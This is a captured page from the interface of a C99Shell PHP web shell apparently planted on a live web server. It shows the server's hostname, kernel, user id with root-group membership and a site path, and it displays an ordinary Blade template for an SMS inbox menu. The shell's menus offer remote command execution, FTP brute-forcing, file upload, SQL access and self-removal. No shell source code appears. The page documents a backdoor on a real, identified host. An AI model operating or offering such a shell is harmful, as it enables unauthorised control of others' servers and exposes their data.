!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/portfolio.picotech.app/public_html/resources/views/customer/smsbox/   drwxr-xr-x
Free 29.22 GB of 117.98 GB (24.76%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     common.blade.php (1.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="card">
    <div class="card-header">
        <h3 class="card-title">{{trans('customer.folders')}}</h3>

        <div class="card-tools">
            <button type="button" class="btn btn-tool" data-card-widget="collapse"><i class="fas fa-minus"></i>
            </button>
        </div>
    </div>
    <div class="card-body p-0">
        <ul class="nav nav-pills flex-column">
            <li class="nav-item active">
                <a href="{{route('customer.smsbox.inbox')}}" class="nav-link">
                    <i class="fas fa-inbox"></i> {{trans('customer.inbox')}}
                    <span class="badge bg-primary float-right">{{auth('customer')->user()->unread_messages()->count()}}</span>
                </a>
            </li>
            <li class="nav-item">
                <a href="{{route('customer.smsbox.sent')}}" class="nav-link">
                    <i class="far fa-envelope"></i> {{trans('customer.sent')}}
                </a>
            </li>
            <li class="nav-item">
                <a href="{{route('customer.smsbox.draft')}}" class="nav-link">
                    <i class="far fa-file-alt"></i> {{trans('customer.draft')}}
                </a>
            </li>
            <li class="nav-item">
                <a href="{{route('customer.smsbox.trash')}}" class="nav-link">
                    <i class="far fa-trash-alt"></i> {{trans('customer.trash')}}
                </a>
            </li>
        </ul>
    </div>
    <!-- /.card-body -->
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]--